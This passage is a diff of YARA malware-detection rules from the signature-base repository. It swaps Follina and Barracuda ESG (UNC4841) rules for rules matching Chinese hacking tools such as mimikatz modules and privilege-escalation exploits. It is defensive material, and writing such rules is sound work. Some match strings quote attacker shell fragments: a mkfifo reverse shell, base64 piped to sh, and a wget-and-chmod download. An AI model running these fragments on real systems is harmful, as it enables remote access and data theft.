-rule SIGNATURE_BASE_EXPL_Follina_CVE_2022_30190_Msdt_Msprotocoluri_May22 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Kappfree_2 : FILE
 {
 	meta:
-		description = "Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation"
-		author = "Tobias Michalski, Christian Burkard"
-		id = "62e67c25-a420-5dac-9d1c-b0648ea6b574"
-		date = "2022-05-30"
-		modified = "2022-07-18"
-		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L80-L98"
+		description = "Chinese Hacktool Set - file kappfree.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6c7b4a99-b5ab-5fd6-b130-7c30b84b7171"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2278-L2294"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d56820737951f97606749c74025589e6a8ecbe70cfff069492368b2ba8528a7d"
-		score = 80
-		quality = 60
-		tags = "CVE-2022-30190, FILE"
-		hash1 = "4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784"
-		hash2 = "778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07"
+		hash = "5d578df9a71670aa832d1cd63379e6162564fb6b"
+		logic_hash = "1862f1283e8a268f523b3922b3630ebbca9a81cc5aed19e5068315e6346d25c2"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$re1 = /location\.href\s{0,20}=\s{0,20}"ms-msdt:/
-		$a1 = "%6D%73%2D%6D%73%64%74%3A%2F" ascii
+		$s1 = "kappfree.dll" fullword ascii
+		$s2 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide
+		$s3 = "' introuvable !" fullword wide
+		$s4 = "kiwi\\mimikatz" fullword wide
 
 	condition:
-		filesize > 3KB and filesize < 100KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_SUSP_Doc_RTF_Ole2Link_Jun22 : FILE
+rule SIGNATURE_BASE_X_Way2_5_Sqlcmd : FILE
 {
 	meta:
-		description = "Detects a suspicious pattern in RTF files which downloads external resources"
-		author = "Christian Burkard"
-		id = "e9c83d58-6214-51d5-882a-4bd2ed6acc9a"
-		date = "2022-06-01"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L100-L131"
+		description = "Chinese Hacktool Set - file sqlcmd.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c6b4dae2-38cb-5cf9-b980-df5ebefbe7ad"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2296-L2324"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4abc20e5130b59639e20bd6b8ad759af18eb284f46e99a5cc6b4f16f09456a68"
-		logic_hash = "36cb711399197c694ac4fa4fd49cd5d587a830e152a138c81851b8e16301803d"
+		hash = "5152a57e3638418b0d97a42db1c0fc2f893a2794"
+		logic_hash = "59fd25a786d56885e456fca154800a8313cd04a23fd9374361cc37b86be109a1"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa = "\\objdata" ascii nocase
-		$sb1 = "4f4c45324c696e6b" ascii
-		$sb2 = "4F4C45324C696E6B" ascii
-		$sc1 = "d0cf11e0a1b11ae1" ascii
-		$sc2 = "D0CF11E0A1B11AE1" ascii
-		$x1 = "68007400740070003a002f002f00" ascii
-		$x2 = "68007400740070003A002F002F00" ascii
-		$x3 = "680074007400700073003a002f002f00" ascii
-		$x4 = "680074007400700073003A002F002F00" ascii
-		$x5 = "6600740070003a002f002f00" ascii
-		$x6 = "6600740070003A002F002F00" ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s2 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s3 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+		$s4 = "kernel32.dll" fullword ascii
+		$s5 = "VirtualAlloc" fullword ascii
+		$s6 = "VirtualFree" fullword ascii
+		$s7 = "VirtualProtect" fullword ascii
+		$s8 = "ExitProcess" fullword ascii
+		$s9 = "user32.dll" fullword ascii
+		$s16 = "MessageBoxA" fullword ascii
+		$s10 = "wsprintfA" fullword ascii
+		$s11 = "kernel32.dll" fullword ascii
+		$s12 = "GetProcAddress" fullword ascii
+		$s13 = "GetModuleHandleA" fullword ascii
+		$s14 = "LoadLibraryA" fullword ascii
+		$s15 = "odbc32.dll" fullword ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7B5C7274 or uint32be( 0 ) == 0x7B5C2A5C ) and $sa and 1 of ( $sb* ) and 1 of ( $sc* ) and 1 of ( $x* )
+		uint16( 0 ) == 0x5a4d and filesize < 23KB and filesize > 20KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Doc_RTF_Ole2Link_EMAIL_Jun22 : FILE
+rule SIGNATURE_BASE_Win32_Klock : FILE
 {
 	meta:
-		description = "Detects a suspicious pattern in RTF files which downloads external resources inside e-mail attachments"
-		author = "Christian Burkard"
-		id = "48cde505-3ce4-52ef-b338-0c08ac4f63de"
-		date = "2022-06-01"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L133-L192"
+		description = "Chinese Hacktool Set - file klock.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dd17a8e2-54af-5967-937a-d83feceab891"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2326-L2341"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4abc20e5130b59639e20bd6b8ad759af18eb284f46e99a5cc6b4f16f09456a68"
-		logic_hash = "fcbb3e32762f8c67b5b226e8095b767d630f8c118521a82fc22f9a3cc272b794"
+		hash = "7addce4434670927c4efaa560524680ba2871d17"
+		logic_hash = "e9f1d38de15ce06d55cf276e0f2becd9f9dbf5bd22f9061de03761d7ccdd3e60"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "XG9iamRhdG" ascii
-		$sa2 = "xvYmpkYXRh" ascii
-		$sa3 = "cb2JqZGF0Y" ascii
-		$sb1 = "NGY0YzQ1MzI0YzY5NmU2Y" ascii
-		$sb2 = "RmNGM0NTMyNGM2OTZlNm" ascii
-		$sb3 = "0ZjRjNDUzMjRjNjk2ZTZi" ascii
-		$sb4 = "NEY0QzQ1MzI0QzY5NkU2Q" ascii
-		$sb5 = "RGNEM0NTMyNEM2OTZFNk" ascii
-		$sb6 = "0RjRDNDUzMjRDNjk2RTZC" ascii
-		$sc1 = "ZDBjZjExZTBhMWIxMWFlM" ascii
-		$sc2 = "QwY2YxMWUwYTFiMTFhZT" ascii
-		$sc3 = "kMGNmMTFlMGExYjExYWUx" ascii
-		$sc4 = "RDBDRjExRTBBMUIxMUFFM" ascii
-		$sc5 = "QwQ0YxMUUwQTFCMTFBRT" ascii
-		$sc6 = "EMENGMTFFMEExQjExQUUx" ascii
-		$x1 = "NjgwMDc0MDA3NDAwNzAwMDNhMDAyZjAwMmYwM" ascii
-		$x2 = "Y4MDA3NDAwNzQwMDcwMDAzYTAwMmYwMDJmMD" ascii
-		$x3 = "2ODAwNzQwMDc0MDA3MDAwM2EwMDJmMDAyZjAw" ascii
-		$x4 = "NjgwMDc0MDA3NDAwNzAwMDNBMDAyRjAwMkYwM" ascii
-		$x5 = "Y4MDA3NDAwNzQwMDcwMDAzQTAwMkYwMDJGMD" ascii
-		$x6 = "2ODAwNzQwMDc0MDA3MDAwM0EwMDJGMDAyRjAw" ascii
-		$x7 = "NjgwMDc0MDA3NDAwNzAwMDczMDAzYTAwMmYwMDJmMD" ascii
-		$x8 = "Y4MDA3NDAwNzQwMDcwMDA3MzAwM2EwMDJmMDAyZjAw" ascii
-		$x9 = "2ODAwNzQwMDc0MDA3MDAwNzMwMDNhMDAyZjAwMmYwM" ascii
-		$x10 = "NjgwMDc0MDA3NDAwNzAwMDczMDAzQTAwMkYwMDJGMD" ascii
-		$x11 = "Y4MDA3NDAwNzQwMDcwMDA3MzAwM0EwMDJGMDAyRjAw" ascii
-		$x12 = "2ODAwNzQwMDc0MDA3MDAwNzMwMDNBMDAyRjAwMkYwM" ascii
-		$x13 = "NjYwMDc0MDA3MDAwM2EwMDJmMDAyZjAw" ascii
-		$x14 = "Y2MDA3NDAwNzAwMDNhMDAyZjAwMmYwM" ascii
-		$x15 = "2NjAwNzQwMDcwMDAzYTAwMmYwMDJmMD" ascii
-		$x16 = "NjYwMDc0MDA3MDAwM0EwMDJGMDAyRjAw" ascii
-		$x17 = "Y2MDA3NDAwNzAwMDNBMDAyRjAwMkYwM" ascii
-		$x18 = "2NjAwNzQwMDcwMDAzQTAwMkYwMDJGMD" ascii
+		$s1 = "klock.dll" fullword ascii
+		$s2 = "Erreur : impossible de basculer le bureau ; SwitchDesktop : " fullword wide
+		$s3 = "klock de mimikatz pour Windows" fullword wide
 
 	condition:
-		filesize < 10MB and 1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* ) and 1 of ( $x* )
+		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_DOC_RTF_Externalresource_EMAIL_Jun22 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Ipsearcher : FILE
 {
 	meta:
-		description = "Detects a suspicious pattern in RTF files which downloads external resources as seen in CVE-2022-30190 / Follina exploitation inside e-mail attachment"
-		author = "Christian Burkard"
-		id = "3ddc838c-8520-5572-9652-8cb823f83e27"
-		date = "2022-06-01"
-		modified = "2025-03-21"
-		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L194-L220"
+		description = "Chinese Hacktool Set - file ipsearcher.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "bb33535a-e8cc-545d-bee8-3c31902eedb9"
+		date = "2015-06-13"
+		modified = "2022-12-21"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2343-L2360"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "73e76bd80f77640c0d8d47ebb7903eb9cc23336fbe653e7d008cae6a0de7c45b"
-		score = 70
-		quality = 85
-		tags = "CVE-2022-30190, FILE"
+		hash = "1e96e9c5c56fcbea94d26ce0b3f1548b224a4791"
+		logic_hash = "e63349ede826bc7b0e9c94d122e5b294c11a598fcf7096b80be726146e796a80"
+		score = 75
+		quality = 83
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "PFJlbGF0aW9uc2hpcH" ascii
-		$sa2 = "xSZWxhdGlvbnNoaXBz" ascii
-		$sa3 = "8UmVsYXRpb25zaGlwc" ascii
-		$sb1 = "VGFyZ2V0TW9kZT0iRXh0ZXJuYWwi" ascii
-		$sb2 = "RhcmdldE1vZGU9IkV4dGVybmFsI" ascii
-		$sb3 = "UYXJnZXRNb2RlPSJFeHRlcm5hbC" ascii
-		$sc1 = "Lmh0bWwhI" ascii
-		$sc2 = "5odG1sIS" ascii
-		$sc3 = "uaHRtbCEi" ascii
+		$s0 = "http://www.wzpg.com" fullword ascii
+		$s1 = "ipsearcher\\ipsearcher\\Release\\ipsearcher.pdb" ascii
+		$s3 = "_GetAddress" fullword ascii
+		$s5 = "ipsearcher.dll" fullword ascii
 
 	condition:
-		filesize < 400KB and 1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* )
+		uint16( 0 ) == 0x5a4d and filesize < 140KB and all of them
 }
-rule SIGNATURE_BASE_SUSP_Msdt_Artefact_Jun22_2 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Ms10048_X64 : FILE
 {
 	meta:
-		description = "Detects suspicious pattern in msdt diagnostics log (e.g. CVE-2022-30190 / Follina exploitation)"
-		author = "Christian Burkard"
-		id = "aa2a4bd7-2094-5652-a088-f58d0c7d3f62"
-		date = "2022-06-01"
-		modified = "2022-07-29"
-		reference = "https://twitter.com/nas_bench/status/1531718490494844928"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L222-L241"
+		description = "Chinese Hacktool Set - file ms10048-x64.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8c9bcf72-1bc7-57ed-9e0b-09d113a8c704"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2362-L2378"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e18f6405f0411128335336e65dda4ed2b6be6e9ad47b94646ececf0479fbe967"
+		hash = "418bec3493c85e3490e400ecaff5a7760c17a0d0"
+		logic_hash = "f6e353a9e4f751632ca5fda1663f0ba66b16b60df90570ccdaf836eaaa6a78ca"
 		score = 75
 		quality = 85
-		tags = "CVE-2022-30190, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "<ScriptError><Data id=\"ScriptName\" name=\"Script\">TS_ProgramCompatibilityWizard.ps1" ascii
-		$x1 = "/../../" ascii
-		$x2 = "$(Invoke-Expression" ascii
-		$x3 = "$(IEX(" ascii nocase
+		$s1 = "The target is most likely patched." fullword ascii
+		$s2 = "Dojibiron by Ronald Huizer, (c) master#h4cker.us  " fullword ascii
+		$s3 = "[ ] Creating evil window" fullword ascii
+		$s4 = "[+] Set to %d exploit half succeeded" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0x6D783F3C and $a1 and 1 of ( $x* )
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and 1 of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_Follina_Jun22 : CVE_2022_30190 FILE
+rule SIGNATURE_BASE_Hscangui : FILE
 {
 	meta:
-		description = "Detects LNK files with suspicious Follina/CVE-2022-30190 strings"
-		author = "Paul Hager"
-		id = "d331d584-2ab3-5275-b435-6129c7291417"
-		date = "2022-06-02"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/gossithedog/status/1531650897905950727"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L243-L261"
+		description = "Chinese Hacktool Set - file hscangui.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f0993510-70ee-52c6-a7b8-e023eb4b33ee"
+		date = "2015-06-13"
+		modified = "2023-12-05"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2380-L2396"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0b63bb266b968987b2b5a83c9429e96acbd57e12178e4f5fd5894b23d1aaa237"
+		hash = "af8aced0a78e1181f4c307c78402481a589f8d07"
+		logic_hash = "9c0eb87dcf8aa107b5289d196650aebcf49c24f57a317de0afdadd61fb5bb5b7"
 		score = 75
 		quality = 85
-		tags = "CVE-2022-30190, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sa1 = "msdt.exe" ascii wide
-		$sa2 = "msdt " ascii wide
-		$sa3 = "ms-msdt:" ascii wide
-		$sb = "IT_BrowseForFile=" ascii wide
+		$s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii
+		$s2 = "http://www.cnhonker.com" fullword ascii
+		$s3 = "%s@ftpscan#Cracked account:  %s/%s" fullword ascii
+		$s4 = "[%s]: Found \"FTP account: %s/%s\" !!!" fullword ascii
 
 	condition:
-		filesize < 5KB and uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and 1 of ( $sa* ) and $sb
+		uint16( 0 ) == 0x5a4d and filesize < 220KB and 2 of them
 }
-rule SIGNATURE_BASE_Gen_Excel_Xor_Obfuscation_Velvetsweatshop : FILE
+rule SIGNATURE_BASE_Goodtoolset_Ms11080 : FILE
 {
 	meta:
-		description = "Detects XOR encryption (c. 2003) in Excel file formats"
-		author = "@JohnLaTwc"
-		id = "8a16105c-4f43-5a35-941c-6ee9593b039c"
-		date = "2020-10-09"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/BouncyHat/status/1308896366782042113"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_excel_xor_obfuscation_velvetsweatshop.yar#L3-L25"
+		description = "Chinese Hacktool Set - file ms11080.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "080e04a3-5cbe-57a8-9106-539451922cb4"
+		date = "2015-06-13"
+		modified = "2022-12-21"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2398-L2417"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c38d56199d34adfc98d8032321239ab20c6eaa8abcafd56f8e1cf24fd3a4094f"
+		hash = "f0854c49eddf807f3a7381d3b20f9af4a3024e9f"
+		logic_hash = "a5b03dded6146dae48bca962e7c5419c2ea69f8709ae7f2c9355bd178d5d77fb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "da1999c23ee2dae02a169fd2208b9766cb8f046a895f5f52bed45615eea94da0"
-		hash2 = "14a32b8a504db3775e793be59d7bd5b584ea732c3ca060b2398137efbfd18d5a"
-		hash3 = "dd3e89e7bde993f6f1b280f2bf933a5cc2797f4e8736aed4010aaf46e9854f23"
-		hash4 = "4e40253b382b20e273edf82362f1c89e916f7ab8d3c518818a76cb6127d4e7c2"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$olemarker = { D0 CF 11 E0 A1 B1 1A E1 00 00 00 }
-		$FilePass_XOR_Obfuscation_VelvetSweatshop = { 2F 00 06 00 00 00 59 B3 0A 9A }
+		$s1 = "[*] command add user 90sec 90sec" fullword ascii
+		$s2 = "\\ms11080\\Debug\\ms11080.pdb" ascii
+		$s3 = "[>] by:Mer4en7y@90sec.org" fullword ascii
+		$s4 = "[*] Add to Administrators success" fullword ascii
+		$s5 = "[*] User has been successfully added" fullword ascii
+		$s6 = "[>] ms11-08 Exploit" fullword ascii
 
 	condition:
-		uint32( 0 ) == 0xe011cfd0 and filesize < 400KB and $olemarker at 0 and $FilePass_XOR_Obfuscation_VelvetSweatshop
+		uint16( 0 ) == 0x5a4d and filesize < 240KB and 2 of them
 }
-rule SIGNATURE_BASE_APT_UNC4841_ESG_Barracuda_CVE_2023_2868_Forensic_Artifacts_Jun23_1 : SCRIPT CVE_2023_2868
+rule SIGNATURE_BASE_Epathobj_Exp64 : FILE
 {
 	meta:
-		description = "Detects forensic artifacts found in the exploitation of CVE-2023-2868 in Barracuda ESG devices by UNC4841"
-		author = "Florian Roth"
-		id = "50518fa1-33de-5fe5-b957-904d976fb29a"
-		date = "2023-06-15"
-		modified = "2023-06-16"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L2-L28"
+		description = "Chinese Hacktool Set - file epathobj_exp64.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cb56bbdc-8afa-5b4b-b7df-942dd3d60366"
+		date = "2015-06-13"
+		modified = "2022-12-21"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2419-L2438"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa7cac1e0f6cb6fa3ac271c1fff0039ff182b6859920b4eca25541457654acde"
+		hash = "09195ba4e25ccce35c188657957c0f2c6a61d083"
+		logic_hash = "dc4073a7d319cffbbce7b3c7b7cf02b007839b72fe14ec1fbdcd3343d57cf7bf"
 		score = 75
 		quality = 85
-		tags = "SCRIPT, CVE-2023-2868"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x01 = "=;ee=ba;G=s;_ech_o $abcdefg_${ee}se64" ascii
-		$x02 = ";echo $abcdefg | base64 -d | sh" ascii
-		$x03 = "setsid sh -c \"mkfifo /tmp/p" ascii
-		$x04 = "sh -i </tmp/p 2>&1" ascii
-		$x05 = "if string.match(hdr:body(), \"^[%w%+/=" ascii
-		$x06 = "setsid sh -c \"/sbin/BarracudaMailService eth0\""
-		$x07 = "echo \"set the bvp ok\""
-		$x08 = "find ${path} -type f ! -name $excludeFileNameKeyword | while read line ;"
-		$x09 = " /mail/mstore | xargs -i cp {} /usr/share/.uc/"
-		$x10 = "tar -T /mail/mstore/tmplist -czvf "
-		$sa1 = "sh -c wget --no-check-certificate http"
-		$sa2 = ".tar;chmod +x "
+		$s1 = "Watchdog thread %d waiting on Mutex" fullword ascii
+		$s2 = "Exploit ok run command" fullword ascii
+		$s3 = "\\epathobj_exp\\x64\\Release\\epathobj_exp.pdb" ascii
+		$s4 = "Alllocated userspace PATHRECORD () %p" fullword ascii
+		$s5 = "Mutex object did not timeout, list not patched" fullword ascii
+		$s6 = "- inconsistent onexit begin-end variables" fullword wide
 
 	condition:
-		1 of ( $x* ) or all of ( $sa* )
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them
 }
-rule SIGNATURE_BASE_APT_MAL_UNC4841_SEASPY_Jun23_1 : CVE_2023_2868 FILE
+rule SIGNATURE_BASE_Kelloworld_2 : FILE
 {
 	meta:
-		description = "Detects SEASPY malware used by UNC4841 in attacks against Barracuda ESG appliances exploiting CVE-2023-2868"
-		author = "Florian Roth"
-		id = "bcff58f8-87f6-5371-8b96-5d4c0f349000"
-		date = "2023-06-16"
+		description = "Chinese Hacktool Set - file kelloworld.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3f298004-e618-5f4a-9cd7-c7c954b6fc64"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://blog.talosintelligence.com/alchimist-offensive-framework/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L30-L55"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2440-L2455"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c1dcb841fb872f0d5e661bfd90fca3075f5efc95b1f9dfff72fa318ed131e9d1"
-		score = 85
+		hash = "55d5dabd96c44d16e41f70f0357cba1dda26c24f"
+		logic_hash = "a575c30c06bd84196cbf01a9b5ef3a042cf29553610421b019227d30a2c7ad1c"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-2868, FILE"
-		hash1 = "3f26a13f023ad0dcd7f2aa4e7771bba74910ee227b4b36ff72edc5f07336f115"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sx1 = "usage: ./BarracudaMailService <Network-Interface>. e.g.: ./BarracudaMailService eth0" ascii fullword
-		$s1 = "fcntl.tmp.amd64." ascii
-		$s2 = "Child process id:%d" ascii fullword
-		$s3 = "[*]Success!" ascii fullword
-		$s4 = "NO port code" ascii
-		$s5 = "enter open tty shell" ascii
-		$op1 = { 48 89 c6 f3 a6 0f 84 f7 01 00 00 bf 6c 84 5f 00 b9 05 00 00 00 48 89 c6 f3 a6 0f 84 6a 01 00 00 }
-		$op2 = { f3 a6 0f 84 d2 00 00 00 48 89 de bf 51 5e 61 00 b9 05 00 00 00 f3 a6 74 21 48 89 de }
-		$op3 = { 72 de 45 89 f4 e9 b8 f4 ff ff 48 8b 73 08 45 85 e4 ba 49 3d 62 00 b8 44 81 62 00 48 0f 45 d0 }
+		$s1 = "Hello World!" fullword wide
+		$s2 = "kelloworld.dll" fullword ascii
+		$s3 = "kelloworld de mimikatz pour Windows" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 9000KB and 3 of them or 5 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
 }
-rule SIGNATURE_BASE_APT_MAL_UNC4841_SEASPY_LUA_Jun23_1 : FILE
+rule SIGNATURE_BASE_Hscan_V1_20_Hscan : FILE
 {
 	meta:
-		description = "Detects SEASPY malware related LUA script"
-		author = "Florian Roth"
-		id = "a44861d0-107e-589b-8cf1-3fbc2f5c78dc"
-		date = "2023-06-16"
+		description = "Chinese Hacktool Set - file hscan.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4183824c-b77f-5500-a962-8d9dc78a9388"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://blog.talosintelligence.com/alchimist-offensive-framework/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_barracuda_esg_unc4841_jun23.yar#L57-L74"
+		reference = "http://tools.zjqhr.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_hacktools.yar#L2457-L2474"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f78823a4ba9e025ba4833a2d5234c7baba33c1167c0247f13b8b2baa430aa4e5"
-		score = 90
+		hash = "568b06696ea0270ee1a744a5ac16418c8dacde1c"
+		logic_hash = "8e30c366c5d5c34a7b50ba4dec17a46c173196b773fff6965891802bcebeb112"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "56e8066bf83ff6fe0cec92aede90f6722260e0a3f169fc163ed88589bffd7451"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "os.execute('rverify'..' /tmp/'..attachment:filename())" ascii fullword
-		$x2 = "log.debug(\"--- opening archive [%s], mimetype [%s]\", tmpfile" ascii fullword
-		$xe1 = "os.execute('rverify'..' /tmp/'..attachment:filename())" ascii base64
-		$xe2 = "log.debug(\"--- opening archive [%s], mimetype [%s]\", tmpfile" ascii base64
+		$s1 = "[%s]: Found \"FTP account: anyone/anyone@any.net\"  !!!" fullword ascii
+		$s2 = "%s -h 192.168.0.1 192.168.0.254 -port -ftp -max 200,100" fullword ascii
+		$s3 = ".\\report\\%s-%s.html" fullword ascii
+		$s4 = ".\\log\\Hscan.log" fullword ascii
+		$s5 = "[%s]: Found cisco Enable password: %s !!!" fullword ascii
 
 	condition:
-		filesize < 500KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them
 }
-rule SIGNATURE_BASE_APT_HKTL_Proxy_Tool_Jun23_1 : FILE
+rule SIGNATURE_BASE__Project1_Generate_Rejoice : FILE
 {
 	meta:
-		description = "Detects agent used as proxy tool in UNC4841 intrusions - possibly Alchemist C2 framework implant"
-		author = "Florian Roth"
-		id = "0e406737-3083-53c2-a6d2-14c07794125a"
-		date = "2023-06-16"
+		description = "Chinese Hacktool Set - from files Project1.exe, Generate.exe, rejoice.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4b36d450-1194-527c-8565-7f321d486d01"
+		date = "2015-06-13"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally"
